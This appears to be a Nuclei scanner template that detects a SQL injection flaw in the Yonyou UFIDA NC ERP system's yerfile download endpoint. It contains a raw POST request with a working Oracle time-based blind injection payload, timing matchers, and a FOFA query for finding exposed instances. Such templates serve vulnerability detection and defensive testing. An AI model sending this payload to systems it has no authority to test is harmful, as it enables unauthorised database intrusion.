id: yonyou-nc-bill-sqli
info:
  name: 用友 UFIDA NC bill - sqli
  author: leadlife
  severity: high
  description: 用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 用友NC yerfile存在SQL注入漏洞
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BNC%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3yerfile_down%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="用友-UFIDA-NC"
  tags: yonyou,oa,nc,sqli

http:
  - raw:
      - |
        @timeout: 15s
        POST /portal/pt/yerfile/down/bill?pageId=login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        
        id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),6)--
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - duration >= 5 && duration < 9
        condition: and